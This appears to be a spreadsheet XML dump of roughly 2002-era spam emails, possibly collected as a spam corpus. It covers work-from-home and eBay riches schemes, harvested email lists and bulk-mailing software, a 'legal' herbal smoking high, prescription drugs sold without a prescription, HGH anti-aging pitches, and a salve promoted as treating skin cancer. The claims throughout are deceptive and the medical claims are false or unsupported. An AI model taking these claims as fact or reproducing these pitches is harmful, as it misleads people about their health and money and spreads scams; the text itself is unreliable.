from the 9 to 5 stress like you can't imagine!Imagine yourself waking up in the morning, turning on your computer and fi=
nding 
out that thousands of dollars had been deposited into your bank account. H=
ow 
would that make you feel?Â  It is 100% possible when you know the secr=
ets to 
making money using eBay and the Internet. If this idea turns you on, then so will this new e-Book 
"Secrets of   eB=
ay 
Powersellers"! Simply fill out the form located on our 
website and you will receive via email this powerful money making e-book,
absolutely FREE (You will instantly =
receive 
your free e-book "Secrets of 
 eBay Powersellers" 
within a few seconds of placing your order).Click here to 
START YOUR JOU=
RNEY! towards 
financial freedom FREE BONUS - Respond within the next=
 5 
minutes and we'll give you our special report "The 5 Secrets to earni=
ng $750 a 
day using eBay and the Internet".Everything we offered here is free, =
you have
everything to gain and 
absolutely nothing to lose - so respond immediately and get started=
 on 
the road to making really big money!Â  
Wouldn't it be nice to tell yo=
ur boss you quit?
Spend more time with your chil=
dren and family members?
Stop dreaming about financial =
freedom.Â  Make it happen!Â  
We can help!=VISIT THE SI=
TE IMMEDIATELY TO BEGIN THIS 
AMAZING JOURNEY INTO FINANCIAL INDEPENDENCE!Â  Click here to 
START YOUR JOU=
RNEY! towards 
financial freedom 
Â 
http://www.2002marketing.com/auction/index.htmlSincerely,Mark W. Monday
The eBay MillionaireClick here to 
START YOUR JOU=
RNEY! towards 
financial freedom
http://www.2002marketing.com/auction/index.html
Â 
Â 
Â 
Â 
Â 
Â 
Â 
NOTICE: Your 
email address was obtained from an opt-in list, 
Reference # 10023387.Â  If you wish to unsubscribe from this =
list, 
please Click Here and send from this e-mail address.Â Â  I=
f you have 
previously unsubscribed and are still receiving this message, you may emai=
l 
ourÂ Abuse Control Center at
Abuse Report.You received this email because you have expressed an interest in making m=
oney 
with eBay and or on the Internet.
Click 
here if you would like to be removed from future information.Â  Do=
 not 
hit reply.Â  Click the CLICK HERE and hit send to be instantly removed=
.
</t>
  </si>
  <si>
    <t xml:space="preserve">Get ready for the most amazing site you will ever see!Click on this link NOW!
http://64.227.161.52/archives/index2.html
http://64.227.161.52/remove/
sheryl-lee.m
</t>
  </si>
  <si>
    <t xml:space="preserve">
The following advertisement is being sponsored by 
AVIRTUALSHOPPER.COM
The Internets Leading source for permission based opt-in marketing
To Opt-Out from our mailing list CLICK HERE
...</t>
  </si>
  <si>
    <t xml:space="preserve">
Specialized Acquired E-Mail Addresses
Â  Â 
Â 
Â 
Â 
To 
                  be deleted from our mailing list, send us an email message to: 
                  mailto:437notoday@excite.com
with the words "Remove-Me" 
                  in the subject heading.Don't 
                        delete this message before reading!!! You will find valuable 
                        information that could make a difference in how you advertise 
                        your business today and in the future!!!                        Hi, My name is Daniel and I have been involved in Internet 
                        Marketing since its inception. E-marketing provides individuals 
                        and businesses with a low cost solution for broad-based 
                        advertising                        If you are new to this concept do not fret! I was too! 
                        It took me over 2 years of research by scowering the Internet, 
                        dealing with false claims, hassling with the (so-called) 
                        "bulk-mail specialists" experiencing the trials 
                        and errors "bogus" software programs and false 
                        claims they make, to truly understand the ins &amp; outs 
                        of marketing concepts and principles of email marketing.These 
                          processes are time consuming, resource intensive, frustrating 
                          and potentially expensive for individuals and companies 
                          to do on their own.
Let's 
                          face it! Most people in business want to make money! 
                          Their time is consumed by running their business, developing 
                          marketing campaigns and advertisement, cashing checks, 
                          dealing with customers, managing their staff and so 
                          on!
They 
                          don't have time to invest in learning 10 or 15 different 
                          software applications, learn how to effectively port 
                          scan for IPS, Socks and SMTP relays, spend thousands 
                          of dollars for "The Best" software applications, 
                          spend hours testing applications for the best results 
                          or for that matter, spending 2 or more years to learn 
                          what someone else has already mastered!
If 
                          you are interested in increasing your effectiveness 
                          with email marketing, increasing your client base, maximizing 
                          your target market or boosting you revenue in a specific 
                          area or geographic territory, then this is were we can 
                          help.
To 
                          find out more, send request with the words "Tell 
                          Me More" in the subject line or body to: 
                          mailto:hhmiyahara@excite.com
LCM 
                          provides simple, effective, low-cost solutions for those 
                          interested in broad-based marketing. By utilizing special, 
                          custom-designed software applications, we are able to 
                          provide broad-based delivery of your advertisements 
                          to millions of people all over the world!We 
                        are probably one of the most important assets you will 
                        need!  Whether 
                          you are trying to promote to 50,000 or 50,000,000 consumers, 
                          individuals and/or businesses, we can assist you in 
                          launching a successful marketing campaign that can potentially 
                          generate increased revenue, sales and customers.
We 
                          also specialize in the acquistion of targeted e-mail 
                          addresses! Our unique service is customized to fit your 
                          needs. These addresses are collected on a per request 
                          basis which provides you with the most up-to-date list 
                          of e-mail addresses anywhere! These addresses are not 
                          months or years old!!! They are collected on a per request 
                          basis in realtime which means they are the most current 
                          and up-to-date addresses, PERIOD!
The 
                          average collection time is 3-5 working days for up to 
                          5 cities or Categories! All addresses are processed 
                          cleaned, stripped, domain verified with foreign domains 
                          removed to provide you with clean deliverable e-mail 
                          addresses for the bestÂ possible results for your 
                          campaign!
To 
                          find out more, send request with the words "Tell 
                          Me More" in the subject line or body to: 
                          mailto:hhmiyahara@excite.com
Every 
                          order is handled individually with the greatest amount 
                          of intregity to ensure clean, quality addresses.Â Unlike 
                          many of your fly-by night companies, our product is 
                          quality,
                          professional and current! We can also be contacted during 
                          normal business hours to answer all of your questions!
Whether 
                          you have an item to sell, a philosophy to share or a 
                          way conduct surveys on a national scale, E-mail marketing 
                          provides you with the most inexpensive and broadest 
                          target
                          of any other form of advertising in the world today!!!
This 
                          form of marketing has been around since 1995 and has 
                          grown to be one of the biggest moneymakers of business 
                          today and long into our future!!! 
There 
                          are many fortune 500 companies that participate in this 
                          form of advertising because it WORKS!!! Just look at 
                          your emails!! 
By 
                          placing your ad over the Internet and directly into 
                          the mailboxes of consumers just like you, you can potentially 
                          generate hundress of thousands of dollars with almost 
                          anything.
Every 
                          year the number of users increases tremendously creating 
                          a huge market. Why not become part of this unlimited 
                          market by participating in the fastest growing form 
                          of advertising in the world!
To 
                          find out more, send request with the words "Tell 
                          Me More" in the subject line or body to: 
                          mailto:hhmiyahara@excite.com                  To be deleted from our mailing list, send us an email message 
                  to: mailto:437notoday@excite.com 
                  with the words "Remove-Me" in the subject heading.Â </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff â€œ1â€ &amp; â€œ2â€ â€œPersonal-Choiceâ€, pipe-smoking products/substances to the common market!!!  We are finally able to offer for your â€œSensitive/Responsiveâ€, â€œPersonal Choiceâ€ Smoking Enjoymentâ€¦.the â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Productâ€¦. Introduced after three years of research and development; Temple â€œ3â€ is â€œPersonal Choiceâ€ legal Smoking/Indulgenceâ€¦.Redefined!!!  Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offerâ€¦.in more cultivated/enhanced/viripotent/substantiated formatâ€¦.what had actually already been the most significant, lawful, â€œPersonal Choiceâ€ smoking substance available on the planetâ€¦.  â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) is the sweet, sweet evolution of all of thatâ€¦. * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE â€œ1â€ &amp; â€œ2â€).* HAPPIER, HAPPY SMOKING!!!* INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.* MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.* NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!* INHIBITS STRESS AND ANXIETYâ€¦.* INSPIRES CONTEMPLATIVENESS &amp; CREATIVITYâ€¦.* ENHANCES THE SEXUAL EXPERIENCE!!!* GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMINGâ€¦.*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WAYâ€¦.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).Temple â€œ3â€ Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-â€œSensitive/Responsiveâ€,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POTENT!!A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon â€œsensitive/responsiveâ€ herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple â€œ3â€ Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the â€œhappinessâ€ coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  Ingredients:Temple smoking substances and Temple â€œ3â€ Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES â€œHouse Smoking Substance Specialtiesâ€.  Temple â€œ3â€ Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) is an absolutely legal, herba/botanical, â€œPersonal Choiceâ€, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple â€œ3â€ Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple â€œ3â€ Ragga Dagga (TM)â€¦.  And although we are not age-governed by lawâ€¦.Temple â€œ3â€ Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple â€œ3â€ Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their timeâ€¦.  As well, Temple â€œ3â€ Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicianâ€™s care in any regard.========================================================
Here is what our customers are saying about the Temple â€œ3â€ Ragga Dagga (TM) phenomenon:â€œTo whom it may concern,I was skeptical when I first read your ad.  I grew up in the 70â€™s &amp; 80â€™s.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think?Sincerely,RJâ€Location: Midwest, U.S.A.â€œThank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you.â€-- Frankie R.Location: West Coast, USAâ€œIâ€™m a man of my 40â€™s and I really know my stuff.  I donâ€™t drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple â€œ3â€.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70â€™s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!â€  -- A.J.Location: United Kingdom
========================================================
Finally, we realize of course that this Temple â€œ3â€ Ragga Dagga (TM) is not inexpensiveâ€¦. (Temple â€œ3â€ Ragga Dagga (TM) is a very, very Sweet Smoke and â€œsweetnessâ€ is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craftâ€¦.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple â€œ3â€ Ragga Dagga (TM)â€¦. Four or five draws of your pipeâ€¦.as is the magical wayâ€¦.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple â€œ3â€ Ragga Dagga (TM) Package.)â€œSeventh Heavenâ€ Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) along with our other â€œvery fineâ€ â€œSensitive/Responsiveâ€ cordial botanical productsâ€¦. Please enjoy!!!  Many Blessings to you allâ€¦.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**************************************************ORDERING INFORMATION:
For your convenience, you can call us direct with your orders or questions.
Call 1-623-974-2295 
Monday - Friday -- 10:30 AM to 7:00 PM (Mountain Time)
Saturday -- 11:00 AM to 3:00 PM (Mountain Time)
For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.**************************************************SPECIAL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To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send. 
 </t>
  </si>
  <si>
    <t xml:space="preserve">Free Debt Consolidation InformationFree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Debt!Â• 100% Confidential - No Obligation - Free Quote Â• Free Debt Consolidation Quote
If you have $4000 or more in debt, a trained professional will negotiate with your creditors to:Lower your monthly debt payments up to 60%End creditor harassmentSave thousands of dollars in interest and late chargesStart improving your credit ratingComplete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inform us :)w1ypq
</t>
  </si>
  <si>
    <t xml:space="preserve"> FOLLOW ME TO FINANCIAL FREEDOM!!
             I'm looking for people with good work ethic 
             and extrordinary desire to earn at least $10,000 per month working from home!NO SPECIAL SKILLS OR EXPERIENCE REQUIRED
            We give you the training and personal support 
            you need to ensure your success!           This LEGITIMATE HOME-BASED INCOME OPPORTUNITY 
           can put you back in control of your time, your finances, and your life!           If you've tried other opportunities in the past 
           that have failed to live up their promises, 
THIS IS DIFFERENT THEN ANYTHING ELSE YOU'VE SEEN!          THIS IS NOT A GET RICH QUICK SCHEME!YOUR FINANCIAL PAST DOES NOT 
          HAVE TO BE YOUR FINANCIAL FUTURE!
          CALL ONLY IF YOU ARE SERIOUS! 1-800-753-7690   (Free, 2 minute message)         DO NOT RESPOND BY EMAIL AND 
         DON'T GO TO SLEEP WITHOUT LISTENING TO THIS!" The moment you commit and quit holding back, all sorts 
        of unforseen incidents, meetings and material assistance 
        will rise up to help you. The simple act of commitment 
        is a powerful magnet for help." - Napoleon HillCLICK HERE TO BE REMOVED FROM THIS MAILING </t>
  </si>
  <si>
    <t xml:space="preserve">
Accept Credit Cards - Everyone Approved
NO CREDIT CHECKSDO IT NOW
3115107654333222221111
</t>
  </si>
  <si>
    <t xml:space="preserve">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?Although often misunderstood, there is one method that has
proven to succeed time-after-time.
         E - M A I L   M A R K E T I N G ! !
Does the thought of $50,000 to $151,200.00 per year make you
tingle with excitement?  Many of our customers make that and 
more... Click here to find out how:
http://32.97.166.75/usinet.steklet 
HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING:
"A gold mine for those who can take advantage of
bulk e-mail programs" - The New York Times"E-mail is an incredible lead generation tool"
- Crains MagazineClick here to find out how YOU can do it:
http://32.97.166.75/usinet.steklet ==========================================================
-=-=-=-=-=-=-=-=-=-=-Remove Instructions=-=-=-=-=-=-=-=-=-**********************************************************
Do not reply to this message - To be removed from future
mailings, Click Here:
mailto:tiana37@flashmail.com?Subject=Remove Please do not include correspondence with your remove 
request  - all requests processed via automatic robot.
********************************************************** [}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">
Bright Teeth now!      Â 
      Â 
Get Your 
            Teeth Bright White Now!  
Have you considered professional teeth whitening? If so, you 
            know it usually costs between $300 and $500 from your local 
            dentist!
Visit our site to learn how to 
            professionally whiten your teeth, using the exact same whitening 
            system your dentist uses, at a fraction of the cost!Here's what you get:We will show you what to look for in a whitening 
              system!
We will show you a comparison of all of the products 
              available today, including their costs!
We know our product is the best on the market, and we back 
              it with a 30 day money back guarantee! 
Click here to learn more!You are receiving this email as an
Internet Affiliate Network member.Â  If you would no longer like to receive
special promotions
Â via email from Internet Affiliate Network, then click
here to unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear friend
Â¡Â¡
Â¡Â¡Â¡Â¡&lt;!-- 
Â¡Â¡
Â¡Â¡Â¡Â¡a { color: #339966; text-decoration: none} 
Â¡Â¡
Â¡Â¡Â¡Â¡a:hover { color: #FF3300; text-decoration: underline} 
Â¡Â¡
Â¡Â¡Â¡Â¡--&gt; 
Â¡Â¡
Â¡Â¡Â¡Â¡You are receiving this email because
you         
registered to receive special offers from one of our marketing
partners.Â         
If you would prefer not to receive future emails, please click         
here to unsubscribe: EmailMarketing@eyou.com   
Now there are billions of email users in the world,and                    
this amount is increasing greatlyÂ everyÂ                      
year .Â  People are now sending informations and conducting theÂ  
internet marketingÂ  through                      
email , because of its cheap cost and fast connection .Â  If you want
to                       
introduce andÂ sell your                      
product or service ,Â  it would be the best wayÂ  for youÂ  to
use                       
theÂ  email toÂ  contact Â withÂ  yourÂ           
targetedÂ  customersÂ  ( ofÂ  courseÂ you
shouldÂ beÂ awareÂ ofÂ                        
theÂ 
emailÂ addressÂ ofÂ theÂ targetedÂ Â          
customersÂ  firstlyÂ  )Â  . TargetedÂ  emailÂ  is no
doubt                       
very effective .Â  IfÂ  youÂ could introduce yourÂ    
productÂ orÂ  service Â throughÂ  emailÂ 
directlyÂ  toÂ                        
theÂ  customerÂ  whoÂ  are interested in them
,Â itÂ                       
will bring to you muchÂ  more businessÂ chance and success.
XinLan Internet Marketing Center , have many years of experience in
developingÂ          
&amp;Â  utilizingÂ                      
internet resources.We have set up global business email address databases,
whichÂ                        
contain                      
millionsÂ  ofÂ Â  emailÂ  addresses ofÂ 
commercialÂ                        
enterprises andÂ  consumersÂ all over the world.Â         
These email addresses are sorted by countries and fields.Â By
usingÂ  advancedÂ                      
professional                     
technology, we also continuously update our databases,add
newÂ addresses ,Â                        
remove undel-                      
iverables and unsubscribeÂ addresses.With  the cooperation with our
partners,                  
We are able to                  
supplyÂ  valid targeted emailÂ  addressesÂ  accordingÂ 
toÂ                   
yourÂ  requirements ( for example,Â  youÂ                  
 needÂ some email                       
addresses of Importers in the field of auto spare part in England ).
WithÂ ourÂ                  
supplied email addresses,you                    
can easily and directly contact your potential customers.
We also supplyÂ  aÂ  wide varietyÂ  of software.Â     
For example ,Â Wcast,Â  the software forÂ  fast-sending
emails:Â          
this software                                            
will enableÂ you toÂ                                            
 sendÂ  emailsÂ  atÂ  the rate ofÂ  over 10,000Â 
pcsÂ                              
per hour,Â and to releaseÂ  informationÂ  toÂ         
 thousands of people in a shortÂ  time.
We are pleased to tell you that we are now offering our best prices
:Â Â Â Â Â Â Â Â Â            
        EmailsÂ  orÂ  SoftwareÂ Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â                           
        Â Â  Remark
Â Â Â                                         
        Price
Â 50,000
targeted                                  
        email addressesÂ We are ableÂ toÂ supplyÂ  
        validÂ  targetedÂ  emailÂ addresses according to your 
        requirements , whichÂ are all compiledÂ  upon
yourÂ order,suchÂ as                                
        region / country / occupationÂ / fieldÂ / Domain Name
(like                             
        AOL.com or MSN.com) etc.
Â             
        USD 30.00Â 
Â Â Â Â     
        Classified email addresses
        Our database contains more than 1600 sort of email addresses,and
can    
        meet with your different demands.  
		Such as: Business email addresses in Japan.                         
        Â 
Â Â 
Â Â Â  8 millions                                  
        email addresses
        8 millions global commercial enterprises email addresses      
        Â 
Â USD                                             
        240.00Â 
Â Â Â Â Â Â Â           
        Wcast softwareÂ 
        Software for fast-sending emailsÂ                         
        Â 
Â             
        USD 39.00Â 
Â Â Â Â Â Â                          
        Email searcher softwareÂ 
        Software for searching targeted email addressesÂ             
        USD 68.00Â 
Â Â Â Â Â Â Â              
        Global
Trade                               
        Poster
        Spreading information about your business or products over 3000
trade              
        message boards and newgroups.Â Â              
        Â 
Â USD          
        135.00Â 
Â Â Â Â Â Â                          
        Jet-Hits Plus 2000 ProÂ 
        Software for submitting website to 8000+Â  search
enginesÂ                                             
        Â 
Â             
        USD 79.00Â                                            
You can order the emails orÂ  softwaresÂ  directlyÂ  from our 
website.Â For more details,
pleaseÂ          
 refer to our website.
It is our honour if you are interested in our services or softwares.Â 
Please do not hesitate to                       
contact us if any queries or concerns.Â It is always our pleasure
toÂ serve you.                                             
Thanks and best regards !
Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â K.
Peng           
Marketing Manager
Emailcentre@163.com 
Http://Emailcenter.51road.com    
XinLan Internet Marketing Center
</t>
  </si>
  <si>
    <t xml:space="preserve">Live and Work In the United States of
America!
The following information is
intended for people who wish to obtain an American Green Card that enables
them to live and work in the United States Legally.The American Green Card Lottery Program (also known as DV2004) is a US
Congress approved program that enables YOU to obtain the American Green Card
through lottery that is conducted yearly by the American Government.
The Diversity Lottery (DV) Program makes 55,000 immigrant visas available
through a lottery. If you win you will be entitled to Live and work In the
United States with your family (you, your spouse and children under 21 years
of age)Why Use Our Services?
Our Organization allows you to fill your application online and ensure that
your application qualifies! You should note that according to the US INS out
of the 10,000,000 applications submitted in one year; 3,000,000 were
disqualified because of bad formatting or misunderstandings of the
requirements.
Take the FREE TEST to ensure your entry qualifies to
participate!
If you have further questions please don't hesitate to contact us.
Sincerely yours,
The American Green Card LotteryÂ 
-------------------------------------------------------------------
-------------
If you do not want to receive any further emails simply go to our unsubscribe page enter your email
address and you will be removed.Â 
Â 6176beqF7-143ocLa5593QDxD2-983vol30
</t>
  </si>
  <si>
    <t xml:space="preserve">=============================================
Astounding New Software Lets You Find
Out Almost ANYTHING about ANYONE...
=============================================Download it right now (no charge card needed):Click here:
http://lv508p.sg.st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http://lv508p.sg.st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http://lv508p.sg.st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found.Click here:
http://lv508p.sg.st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http://lv508p.sg.st 
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:
mailto:stop0507@excite.com?subject=STOP_LV2X0508 Please allow up to 72 hours to take effect.Please do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically. [:}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">DetailsWant to refinance?Fill our this quick form and immediately have mortgage
companies compete for you business. You will be offered the, absolute, BEST refinance rates 
availible!Your credit doesn't matter, don't even worry about past 
credit problems, we can refinance ANYONE!Let Us Put Our Expertise to Work for You!http://210.51.251.244/al/cgi-bin/redir.cgi?goto=ID74210Or Site 2
http://61.129.81.99/al/cgi-bin/redir.cgi?goto=ID74215
Erase
http://210.51.251.244/al/uns/list.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations, 
You Won $30 FreeToday At The Internet's Best &amp; MostTrusted On-Line 
Casino!
To Collect Your 
$30 Cash Click Here!Â 
To Collect Your $30 Cash Click Here!
Â Â 
Â 
Â This message is sent in compliance of the new 
            e-mail bill:SECTION 301 Per Section 301, Paragraph (a)(2)(C) of 
            S. 1618,Further transmissions to you by the sender of this email 
            maybestopped at no cost to you by entering your email address 
            tothe form in this email and clicking submit to be 
            automatically   
                               removed. To be Removed from our 
            Opt-In mailing list. Please enter your email address in the provided 
            box below and click remove, thank you. 
Your 
                          E-mail Address Will Be Immediately Removed From All Mailing Lists
</t>
  </si>
  <si>
    <t xml:space="preserve">
quotepool insuranceâ„¢&lt;!--
td {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 11px;
	color: black;
}
text {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 11px;
	color: black;
}text2 {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 12px;
	color: black;
}footer {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 10px;
	color: white;
	font-weight: bold;
}a.footer {color: white; text-decoration: none;}
a.footer:visited {color: white; text-decoration: none;}
a.footer:hover {color: white; text-decoration: underline;}button {
	font-size: 11px;
	border-width: 0;
	background-color: #476f8f;
	color: white;
	font-family: Verdana, Tahoma, sans-serif;
	font-weight: bold;
}
#selected {
	color: #F5989D;
	text-decoration: none;
}clicker {cursor: hand}div {position: absolute; z-index: 190; width: 640; top: 0; left: 0; overflow: hidden;}span {position: absolute; z-index: 200; width: 100%; top: 0; left: 0;}a {color: white; text-decoration: none;}
//--&gt;We will attempt to provide you with the best quote you can possibly get! Our team of companies and their agents will provide a no-nonsense approach to your insurance needs. If all you want to do is ask a few questions, then they will be glad to help. They can also ease your mind and provide the insurance quickly and effortlessly. Either way, you will be glad you filled out our quick, no-obligation quote form! 
Life insurance should be an essential part of any financial plan. The purpose is to protect your family's income, in the case of your death. Life Insurance can also be used for financial strength while you are still alive. It's a foundation for a strong financial portfolio! In either case, the proceeds could be used to:Meet your children's college expenses!
Ensure comfortable retirement for your spouse!
Assist in the payment of outstanding debt!
Tax Benefit and Estate ProtectionPrivacy | Unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">
Full Access Medical          To sign up for the Full Access Medical, LLC Plan the applicant must 
          be at least 18 and pay a one-time enrollment fee of  regardless of 
          the number of dependents enrolled. This non-insurance healthcare plan 
          is not available in Washington.This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http://65.162.84.5/perl/unsubscribe.pl?s=20020510190852000001230835  to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316</t>
  </si>
  <si>
    <t>Maxim Casino ad
CLICK HERE TO GET YOUR FREE 
              $500
$$$ Maxim Sportsbook and Casino are proud to announce 
              that you get up to $500 with every new Casino and Sportsbook Account 
              created $$$
$$$ We will also honour a FREE 2-3 night vacation for you 
              and a loved one. That's right!..not only do you get a Fantastic 
              betting account at a GREAT book you also get a FREE vacation 
              $$$
Sick of loosing money on casino games then don't be sick 
              any more as Maxim Casino has one of the highest payouts in the 
              industry.
MAXIM 
            SPORTSBOOK AND CASINO
CLICK HERE TO GET YOUR FREE 
            VACATION
This email is not sent unsolicited. You opted-in with CNN-SI. You are receiving it because you requested to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http://65.162.84.5/perl/unsubscribe.pl?s=20020511002124000000703384  to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316</t>
  </si>
  <si>
    <t xml:space="preserve">
Lose weight while building lean muscle massÂ  and reversing the
ravages of aging all at once
Â 
Â Human
Growth Hormone Therapy
Lose weight
while building lean muscle mass
Â and
reversing the ravages of aging all at once.
Remarkable discoveries
about Human Growth Hormones (HGH)Â 
are changing
the way we think about aging and weight loss.
Â 
Lose
Weight
Build
Muscle Tone
Reverse
Aging
Increased
Libido
Duration
Of Penile Erection
Â New
Hair Growth
Â Improved
Memory
Â Improved
skin
Â New
Hair Growth
Â Wrinkle
DisappearanceÂ Visit
Our Web Site and Lean The Facts: Click Here
Â 
</t>
  </si>
  <si>
    <t>How would you like a Top Rated Law Firm working for you, your family and your business for only pennies a day?CLICK HERE
http://211.78.96.242/legalservices/
Get full details on this great service! FREE!Whether it's a simple speeding ticket or an extensive child custody case, we cover all areas of the legal system.* Court Appearances on Your Behalf
* Unlimited Phone Consultations
* Review of ALL Your Legal Documents &amp; Contracts
* Take Care of Credit ProblemsAnd that is just the beginning!CLICK HERE
http://211.78.96.242/legalservices/
to get full details on this great service!************************************************
Simple Removal instructions:
To be removed from our in-house list simply visit
http://211.78.96.242/removal/remove.htm
Enter your email addresses to unsubscribe.</t>
  </si>
  <si>
    <t>WAKE UP!
Here's the deal: Mortgage interest rates are DOWN right NOW, but with the economy improving it is only a matter of time before they go UP again!
If you are thinking about refinancing, PLEASE do not hesitate - find out what kind of GREAT deal you may qualify for RIGHT NOW! There is no time like the present!
Get a FREE, NO OBLIGATION quote to find out how much you could save every month. You could be NEEDLESSLY throwing away money every month. Don't you have better things to do with your money?
 http://first.topdrawerbiz.com/home/
It sure won't hurt to find out.
*******************************************
To unsubscribe, click below:
http://211.78.96.242/removal/remove.htm
Allow 72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve"> MERIDIA Â® is an FDA-approved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http://www.globalrxco.com/main2.php?rx=16701 RETIN-A Â® is used in the treatment of acne as 
 well as to reduce the signs of aging.
  Many other prescription drugs available, including: 
  VIAGRA Less than 7.00 a pill!!!!!!!!!!!!  VALTREX, Treatement for Herpes.   PROPECIA, the first pill that effectively treats male pattern 
  hair loss.   ZYBAN, Zyban is the first nicotine-free pill that, as part of a 
  comprehensive program from your health care professional,  
  can help you stop smoking.   CLARITIN, provides effective relief from the symptoms of seasonal 
  allergies. 
  And Much More... 
  http://www.globalrxco.com/main2.php?rx=16701
  EXIT INSTRUCTIONS: 
  To Be EXTRACTED From Future Mailings: 
  mailto:kislinger987@eudoramail.com
  </t>
  </si>
  <si>
    <t xml:space="preserve">
Â  Chickweed Healing 
Salve 
"A Natural Way To Healthy Skin"
A healing 
salve for skin problems such as...
* PsoriasisÂ Â Â  
Â Â Â  * Skin CancerÂ Â Â  Â Â Â  * 
RashesÂ Â Â  Â Â Â  * Sore Throats
* 
CutsÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â * 
BurnsÂ Â Â Â *HemorrhoidsÂ Â Â Â Â * Poison 
IvyÂ Â Â  * Colds
* Diaper RashÂ Â Â  * Excema, and 
more!
Â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2 weeks without leaving a scar. - Sheila Holbrook,  
 Testimonial: My newly born baby, now one month 
old, had chronic diaper rash. Several doctors had tried to get it to go 
away...nothing seemed to work, she continued to be raw and sore. She cried all 
the time. I tried your Chickweed Healing Salve, putting it on that night. 
By the next morning she was much better. After using it for 2 days, she was 
completely cured. She is now a beautiful baby. She doesn't cry anymore. I paid 
$19.95 for it, however I would gladly have paid $100. Thanks so much. I will 
always keep it on hand. I will gladly give your product a good reference if 
anyone wants to give me a call. Shellie Cooper Stanly, KS 
Testimonial: I had these dark spots on my leg for 15 years. I'm 
not sure what it was but it was growing! After two months of using the 
Chickweed Healing Salve the spots are almost gone. I also use it 
for dry skin on my heels and toes. Its amazing stuff! Kirk B. Testimonial: I 
had a rash under my arm for 9 months. I tried a lot of salves and lotions but 
nothing worked until I tried Chickweed Healing Salve . I applied 
it 2 times a day and it went away within one month. I also had some spots on my 
face. Within 3 and 1/2 weeks they were all gone. Steve Burington 
 Testimonial:I 
burned myself real bad across the chest, arms, and hands. I started using 
Chickweed Healing Salve on my 3rd day in the burn unit at University of 
Louisville Hospital and had immediate results. The nurses were impressed at the 
results, 8 days later I was released. - Charles Mulligan, Athens, 
TNTestimonial:Does a lot of good for just about anything you 
use it for. - William Byler, Centerville, PA  If you 
have a persistent skin problem that just won't go awayÂ this may be the 
relief you've been looking for. Call us and place your order today! 
281-681-3952One 4-oz tin container $19.95 + FREE S&amp;H 
Two 4-oz tin containers $29.95 + FREE S&amp;H Send Check Money order or Credit Card Payment to: 
CHS Laboratory 1007 Whitestone Lane Houston, TX 77073 
If you would like to place a Credit Card order 
call:281-681-3952We accept all 
major credit 
cards.
</t>
  </si>
  <si>
